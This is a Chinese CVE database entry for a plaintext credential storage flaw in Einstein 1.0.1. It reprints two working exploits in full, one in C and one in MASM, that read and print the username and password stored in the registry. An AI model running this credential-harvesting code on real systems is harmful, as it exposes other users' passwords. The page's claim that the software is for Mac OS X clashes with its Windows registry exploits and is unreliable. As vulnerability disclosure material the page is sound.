CVE-2005-0619
CVSS2.1
发布时间 :2005-02-28 00:00:00
修订时间 :2008-09-10 15:36:18
NMCOE    

[原文]Einstein 1.0.1 stores sensitive information such as usernames and passwords in plaintext in the registry, which allows local users to gain privileges.


[CNNVD]Einstein 注册表敏感信息存储漏洞(CNNVD-200502-105)

        Einstein是一款为Mac OS X设计的问题测试软件。
        Einstein 1.0.1 在注册表里以明文的形式存储了username和password等敏感信息,本地用户可以以此获得相应权限。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0619
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0619
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-105
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/14212
(VENDOR_ADVISORY)  OSVDB  14212
http://securitytracker.com/id?1013316
(VENDOR_ADVISORY)  SECTRACK  1013316
http://secunia.com/advisories/14455
(VENDOR_ADVISORY)  SECUNIA  14455
http://milw0rm.com/exploits/846
(UNKNOWN)  MILW0RM  846

- 漏洞信息

Einstein 注册表敏感信息存储漏洞
低危 未知
2005-02-28 00:00:00 2005-10-20 00:00:00
本地  
        Einstein是一款为Mac OS X设计的问题测试软件。
        Einstein 1.0.1 在注册表里以明文的形式存储了username和password等敏感信息,本地用户可以以此获得相应权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (846)

Einstein <= 1.01 Local Password Disclosure Exploit (EDBID:846)
windows local
2005-02-27 Verified
0 Kozan
N/A [点击下载]
/*******************************************************************

Einstein v1.01 Local Password Disclosure Exploit by Kozan

Application: Einstein v1.01 (and previous versions)
Procuder: Bfriendly.com
Vulnerable Description: Einstein v1.01 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <windows.h>

HKEY hKey;

#define BUFSIZE 100
char username[BUFSIZE], password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\einstein",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "username", NULL, NULL,
              (LPBYTE) username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("En error occured!");
                                return 0;
                       }

                       lRet = RegQueryValueEx( hKey, "password", NULL, NULL,
              (LPBYTE) password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("En error occured!");
                                return 0;
                       }
                       RegCloseKey( hKey );

                       printf("Einstein v1.01 Local Exploit by Kozan\n");
                       printf("Credits to ATmaCA\n");
                       printf("www.netmagister.com  -  www.spyinstructors.com\n");
                       printf("kozan@netmagister.com\n\n");
                       printf("Username: %s\n",username);
                       printf("Password: %s\n",password);

        }
        else{
                printf("Einstein v1.01 is not installed on your system!\n");
        }

       return 0;
}

// milw0rm.com [2005-02-27]
		

- 漏洞信息 (848)

Einstein <= 1.01 Local Password Disclosure Exploit (asm) (EDBID:848)
windows local
2005-02-28 Verified
0 illwill
N/A [点击下载]
; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
.data
   SubKey            db "Software\\einstein",0
   szUser            db "username",0
   szPass            db "password",0
   noExeem           db "Einstein v1.01 is not installed on your pc!",0
   Theoutput  db   '_______________________________________________________________',13,10
              db   '*               Einstein v1.01 Local  Pass Exploit            *',13,10
              db   '*                    Based On Kozans code in C                *',13,10
              db   '*                by illwill  - xillwillx@yahoo.com            *',13,10
              db   '*_____________________________________________________________*',13,10
              db   '                      UserName: %s                             ',13,10
              db   '                      Password: %s                             ',13,10,0
   KeySize    DWORD 255
.data?
    TheIPData           db 64 dup (?)
    TheUSERData         db 64 dup (?)
    ThePASSData         db 64 dup (?)
    TheReturn           DWORD ?
    strbuf              db 258 dup (?) 
.code
start:
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn
     .IF eax==ERROR_SUCCESS
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
                        .ENDIF
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
        invoke StdOut, addr strbuf
     .ELSE  
        invoke StdOut, addr noExeem  
     .ENDIF
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start

; milw0rm.com [2005-02-28]
		

- 漏洞信息

14212
Einstein Registry Cleartext Password Disclosure
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Einstein contains a flaw that may lead to an unauthorized information disclosure. The issue is due to plaintext storage of passwords in the registry, which may disclose username (mail address) and passwords to local users resulting in a loss of confidentiality.

- 时间线

2005-02-27 Unknow
2005-02-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站